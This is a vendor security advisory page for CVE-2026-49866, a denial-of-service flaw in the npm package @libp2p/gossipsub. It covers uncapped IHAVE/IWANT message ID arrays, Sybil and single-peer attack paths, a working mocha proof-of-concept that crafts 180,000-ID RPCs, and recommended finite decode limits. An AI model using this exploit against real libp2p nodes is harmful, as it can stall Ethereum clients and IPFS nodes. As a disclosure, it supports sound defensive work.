CVE-2026-49866

CVE-2026-49866 is a high-severity improper input validation vulnerability in @libp2p/gossipsub (npm), affecting versions < 16.0.0. It is fixed in 16.0.0.

Check whether CVE-2026-49866 affects your applications

Kodem tells you whether this CVE is present, reachable, and actually executing in your application, so you know if it matters.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence. Only the CVEs that actually run in production.

Summary

libp2p: CPU DoS via oversized IHAVE and IWANT control message arrays

Full technical description

gossipsub processes IHAVE and IWANT control messages by iterating every received message ID synchronously before doing anything with the results. There is no cap on how many IDs a single frame may contain. The default LP frame limit is 4MB, which fits roughly 180,000 message IDs. Iterating that many IDs blocks the Node.js event loop for around 200ms per call.

The two variants have different severity. For IHAVE there is a per-peer per-heartbeat counter that limits each peer to one full iteration per heartbeat, so causing a total stall requires around 10 Sybil peers. For IWANT there is no equivalent counter at all, so a single peer continuously streaming 4MB frames can hold the event loop above 80% utilisation indefinitely.

Details

No decode-time cap on message ID count (message/decodeRpc.ts:11-19)

export const defaultDecodeRpcLimits: DecodeRPCLimits = {
  maxSubscriptions: Infinity,
  maxMessages: Infinity,
  maxIhaveMessageIDs: Infinity,
  maxIwantMessageIDs: Infinity,
  maxIdontwantMessageIDs: Infinity,
  maxControlMessages: Infinity,
  maxPeerInfos: Infinity
}

These are the defaults unless the operator explicitly overrides opts.decodeRpcLimits. A TODO at gossipsub.ts:857 already notes the gap: // TODO: Check max gossip message size, before decodeRpc().

IHAVE iterates all IDs before truncating (gossipsub.ts:1311-1327)

messageIDs.forEach((msgId) => {                                                                            
  const msgIdStr = this.msgIdToStrFn(msgId)                                                               
  if (!this.seenCache.has(msgIdStr)) {                                                                     
    iwant.set(msgIdStr, msgId)                                                                            
  }                                                                                                       
})                                                                                                        
// truncation to GossipsubMaxIHaveLength (5000) only happens after the loop finishes                      

The per-peer flood counters (iasked, peerhave) do cap things eventually: each peer is limited to 10 IHAVE RPCs and 5000 IDs counted per heartbeat. After the first oversized IHAVE from a peer, subsequent ones are rejected cheaply. The problem is that the cap is per peer, so 10 Sybil peers each sending one 180K-ID IHAVE per heartbeat gives 10 x 150ms = 1500ms of synchronous work against a 1000ms heartbeat interval.

IWANT has no rate limit at all (gossipsub.ts:1377-1394)

messageIDs?.forEach((msgId) => {                     
  const msgIdStr = this.msgIdToStrFn(msgId)          
  const entry = this.mcache.getWithIWantCount(msgIdStr, id)                                               
  // ...                                                                                                  
})                                                                                                        

Unlike IHAVE, handleIWant has no peerhave or iasked equivalent. A single peer can send IWANT RPCs continuously with no per-heartbeat limit. Sending IWANT for non-existent messages does not affect the attacker's score (onIwantRcv is metrics-only), so there is no automatic disconnect. At 1 Gbps a 4MB frame arrives every ~32ms and takes ~135ms to process, giving roughly 81% event-loop utilisation from a single connection.

Attack Paths

IHAVE (requires ~10 Sybil peers)
The attacker connects 10 peers, each subscribing to a topic the victim is on. New peers start at score 0, which is above the default gossipThreshold of -10, so IHAVE processing is active immediately. Each peer sends one 4MB RPC per heartbeat containing a single ControlIHave entry with ~180,000 random message IDs. The victim processes all 180,000 IDs per peer before the counter kicks in for that peer. Total event-loop block: around 1500ms per 1000ms heartbeat.

IWANT (single peer, no Sybil)
The attacker connects once and streams 4MB IWANT RPCs continuously, each containing ~180,000 random message IDs that do not exist in the victim's cache. No rate limit applies. At datacenter bandwidth the event loop stays above 80% utilisation indefinitely.

PoC

Setup and execution of PoC

git clone https://github.com/libp2p/js-libp2p.git
cd js-libp2p                                         
npm install                                          
cd packages/gossipsub                                
npx aegir build                                      
node --experimental-vm-modules ../../node_modules/.bin/mocha 'dist/test/poc.spec.js' --timeout 30000                                             

PoC Content:

import { stop } from '@libp2p/interface'
import assert from 'node:assert'
import { performance } from 'node:perf_hooks'
import { encode as lpEncode } from 'it-length-prefixed'
import { pEvent } from 'p-event'
import { RPC } from '../src/message/rpc.js'
import { GossipsubMaxIHaveMessages, GossipsubMaxIHaveLength, GossipsubHeartbeatInterval } from '../src/constants.js'
import { createComponents, connectPubsubNodes } from './utils/create-pubsub.js'
import type { GossipSubAndComponents } from './utils/create-pubsub.js'

const TOPIC = 'poc-ihave-flood'
const MSG_ID_BYTES = 20
// 4 MB LP limit / ~22 bytes per message ID (1-byte tag + 1-byte len + 20 bytes)
const MSG_IDS_PER_IHAVE = 180_000

function randomMsgIds (count: number): Uint8Array[] {
  return Array.from({ length: count }, () => {
    const id = new Uint8Array(MSG_ID_BYTES)
    crypto.getRandomValues(id)
    return id
  })
}

describe('CPU DoS via oversized IHAVE and IWANT control message arrays', function () {
  this.timeout(30_000)

  let victim: GossipSubAndComponents
  let attacker: GossipSubAndComponents

  beforeEach(async () => {
    ;[victim, attacker] = await Promise.all([
      createComponents({ init: { allowPublishToZeroTopicPeers: true } }),
      createComponents({ init: { allowPublishToZeroTopicPeers: true } })
    ])

    // Both subscribe to the topic so the victim builds a mesh entry
    victim.pubsub.subscribe(TOPIC)
    attacker.pubsub.subscribe(TOPIC)

    await connectPubsubNodes(victim, attacker)

    // Wait for one heartbeat so the victim's mesh includes the attacker
    await pEvent(victim.pubsub, 'gossipsub:heartbeat')
  })

  afterEach(async () => {
    await stop(
      victim.pubsub, attacker.pubsub,
      ...Object.values(victim.components),
      ...Object.values(attacker.components)
    )
  })

  it('BYPASS: single IHAVE with 180K message IDs blocks event loop for ~135ms', async () => {
    const attackerIdStr = attacker.components.peerId.toString()

    // Verify attacker is in victim's mesh (required for handleIHave to iterate IDs)
    const meshPeers = (victim.pubsub as any).mesh.get(TOPIC) as Set<string> | undefined
    if (meshPeers == null || !meshPeers.has(attackerIdStr)) {
      // Force mesh membership for the PoC if heartbeat hasn't built it yet
      if (meshPeers == null) {
        (victim.pubsub as any).mesh.set(TOPIC, new Set([attackerIdStr]))
      } else {
        meshPeers.add(attackerIdStr)
      }
    }

    const messageIDs = randomMsgIds(MSG_IDS_PER_IHAVE)

    // Invoke handleIHave directly
    const t0 = performance.now()
    const iwant = (victim.pubsub as any).handleIHave(
      attackerIdStr,
      [{ topicID: TOPIC, messageIDs }]
    ) as Array<{ messageIDs: Uint8Array[] }>
    const elapsed = performance.now() - t0

    console.log(`\n[PoC] 1 IHAVE × ${MSG_IDS_PER_IHAVE.toLocaleString()} IDs: ${elapsed.toFixed(0)} ms event-loop block`)
    console.log(`[PoC] Response capped at: ${iwant[0]?.messageIDs?.length ?? 0} IWANTs (limit: ${GossipsubMaxIHaveLength})`)
    console.log(`[PoC] Heartbeat interval:  ${GossipsubHeartbeatInterval} ms`)

    // The blocking time should be significant (>>10ms) for a meaningful DoS
    assert.ok(elapsed > 50,
      `expected >50ms event-loop block for ${MSG_IDS_PER_IHAVE} IDs, got ${elapsed.toFixed(0)}ms`)

    // Victim caps the response regardless of how many IDs were iterated
    assert.ok(
      iwant[0]?.messageIDs?.length <= GossipsubMaxIHaveLength,
      `response should be capped at ${GossipsubMaxIHaveLength}`
    )
  })

  it('MULTI-PEER: N peers × 1 IHAVE each, iasked resets per peer, total block scales linearly', async () => {
    const N_PEERS = 10
    const messageIDs = randomMsgIds(MSG_IDS_PER_IHAVE)

    // Ensure mesh includes a placeholder topic so !this.mesh.has(topicID) passes
    const fakeMeshPeers: Set<string> = new Set()
    ;(victim.pubsub as any).mesh.set(TOPIC, fakeMeshPeers)

    let totalElapsed = 0

    for (let i = 0; i < N_PEERS; i++) {
      // Each "Sybil" peer uses a unique peer ID string
      const fakePeerId = `12D3KooW${i.toString().padStart(36, '0')}`
      fakeMeshPeers.add(fakePeerId)

      // Fresh counters: simulates a peer the victim hasn't seen this heartbeat
      ;(victim.pubsub as any).peerhave.delete(fakePeerId)
      ;(victim.pubsub as any).iasked.delete(fakePeerId)
      // Score defaults to 0 (> gossipThreshold of -10): no score entry needed

      const t0 = performance.now()
      ;(victim.pubsub as any).handleIHave(fakePeerId, [{ topicID: TOPIC, messageIDs }])
      const elapsed = performance.now() - t0

      totalElapsed += elapsed
      process.stdout.write(`  peer ${i + 1}/${N_PEERS}: ${elapsed.toFixed(0)} ms\n`)
    }

    const ratio = totalElapsed / GossipsubHeartbeatInterval
    console.log(`\n[PoC] ${N_PEERS} peers × ${MSG_IDS_PER_IHAVE.toLocaleString()} IDs: ${totalElapsed.toFixed(0)} ms total`)
    console.log(`[PoC] Heartbeat interval:                    ${GossipsubHeartbeatInterval} ms`)
    console.log(`[PoC] Ratio (block / heartbeat):             ${ratio.toFixed(2)}x`)
    console.log(`[PoC] Attacker cost: ${N_PEERS} × 4 MB = ${N_PEERS * 4} MB/s outbound`)
    console.log(`[PoC] Each peer's iasked resets at heartbeat, sustainable indefinitely`)

    // 10 peers should easily exceed the 1s heartbeat interval
    assert.ok(
      totalElapsed > GossipsubHeartbeatInterval * 0.9,
      `expected ${N_PEERS} peers to block ≥ ${GossipsubHeartbeatInterval * 0.9} ms, got ${totalElapsed.toFixed(0)} ms`
    )
  })

  it('ENCODE: crafted 180K-ID IHAVE RPC fits within 4 MB LP frame limit', () => {
    const messageIDs = randomMsgIds(MSG_IDS_PER_IHAVE)

    const rpc = RPC.encode({
      subscriptions: [],
      messages: [],
      control: {
        ihave: [{ topicID: TOPIC, messageIDs }],
        iwant: [],
        graft: [],
        prune: [],
        idontwant: []
      }
    })

    const MAX_LP_BYTES = 4 * 1024 * 1024  // DEFAULT_MAX_DATA_LENGTH from it-length-prefixed

    console.log(`\n[PoC] Serialised RPC size: ${(rpc.byteLength / (1024 * 1024)).toFixed(2)} MB`)
    console.log(`[PoC] LP frame limit:      ${MAX_LP_BYTES / (1024 * 1024)} MB`)
    console.log(`[PoC] Fits in one frame:   ${rpc.byteLength <= MAX_LP_BYTES ? 'YES ✓' : 'NO ✗'}`)
    console.log(`[PoC] defaultDecodeRpcLimits.maxIhaveMessageIDs = Infinity (no decode-level cap)`)

    assert.ok(rpc.byteLength <= MAX_LP_BYTES,
      `crafted RPC (${rpc.byteLength} bytes) must fit in the 4 MB LP default, confirms no LP-level protection`)
  })
})

The IWANT variant has the same per-frame timing but does not need Sybil peers. A separate IWANT PoC can be provided on request.

Impact

Any node running @libp2p/gossipsub with default options that accepts inbound connections is affected. This includes Ethereum consensus clients using js-libp2p (Lodestar), IPFS nodes with pubsub enabled, and anything calling createLibp2p({ services: { pubsub: gossipsub() } }).

With 10 Sybil peers the IHAVE variant blocks the event loop for 1.5x the heartbeat interval continuously. The node cannot forward messages, run its heartbeat, or respond to legitimate peers. The IWANT variant achieves the same result from a single connection at datacenter bandwidth.

Nodes that explicitly configure opts.decodeRpcLimits with finite values are not affected.

The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.

CVE-2026-49866 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (16.0.0); upgrading removes the vulnerable code path.

Affected versions

@libp2p/gossipsub (< 16.0.0)

Security releases

@libp2p/gossipsub → 16.0.0 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Set finite defaults in decodeRpc.ts:

export const defaultDecodeRpcLimits: DecodeRPCLimits = {
  maxSubscriptions: 128,
  maxMessages: 256,                                                                                                                                                                                                                                  
  maxIhaveMessageIDs: 5_000,
  maxIwantMessageIDs: 5_000,                                
  maxIdontwantMessageIDs: 5_000,
  maxControlMessages: 128,
  maxPeerInfos: 16
}

Setting maxIhaveMessageIDs and maxIwantMessageIDs to 5000 (matching GossipsubMaxIHaveLength) bounds the iteration cost to the response limit rather than attacker input.

Frequently Asked Questions

  1. What is CVE-2026-49866? CVE-2026-49866 is a high-severity improper input validation vulnerability in @libp2p/gossipsub (npm), affecting versions < 16.0.0. It is fixed in 16.0.0. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
  2. How severe is CVE-2026-49866? CVE-2026-49866 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of @libp2p/gossipsub are affected by CVE-2026-49866? @libp2p/gossipsub (npm) versions < 16.0.0 is affected.
  4. Is there a fix for CVE-2026-49866? Yes. CVE-2026-49866 is fixed in 16.0.0. Upgrade to this version or later.
  5. Is CVE-2026-49866 exploitable, and should I be worried? Whether CVE-2026-49866 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-49866 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-49866? Upgrade @libp2p/gossipsub to 16.0.0 or later.

Other vulnerabilities in @libp2p/gossipsub

Stop the waste.
Protect your environment with Kodem.